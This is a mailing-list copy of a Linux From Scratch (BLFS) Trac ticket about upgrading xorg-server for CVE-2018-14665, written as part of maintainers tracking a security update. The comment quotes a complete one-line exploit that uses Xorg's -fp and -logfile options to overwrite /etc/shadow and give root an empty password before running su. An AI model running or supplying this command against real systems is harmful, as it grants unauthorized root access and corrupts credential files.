Re: [blfs-book] [BLFS Trac] #11284: xorg-server-1.20.3 (CVE-2018-14665, local file overwrite)

BLFS Trac via blfs-book Sat, 27 Oct 2018 10:27:00 -0700

#11284: xorg-server-1.20.3 (CVE-2018-14665, local file overwrite)
-------------------------+------------------------
 Reporter:  renodr       |       Owner:  blfs-book
     Type:  enhancement  |      Status:  new
 Priority:  high         |   Milestone:  8.4
Component:  BOOK         |     Version:  SVN
 Severity:  normal       |  Resolution:
 Keywords:               |
-------------------------+------------------------


Comment (by renodr):

 From Twitter:

 "@hackerfantastic

 #CVE-2018-14665 - a LPE exploit via X.org fits in a tweet

 cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1; su

 Overwrite shadow (or any) file on most Linux, get root privileges. *BSD
 and any other Xorg desktop also affected."

--
Ticket URL: <http://wiki.linuxfromscratch.org/blfs/ticket/11284#comment:2>
BLFS Trac <http://wiki.linuxfromscratch.org/blfs>
Beyond Linux From Scratch
-- 
http://lists.linuxfromscratch.org/listinfo/blfs-book
FAQ: http://www.linuxfromscratch.org/blfs/faq.html
Unsubscribe: See the above information page

Re: [blfs-book] [BLFS Trac] #11284: xorg-server-1.20.3 (CVE-2018-14665, local file overwrite)

Reply via email to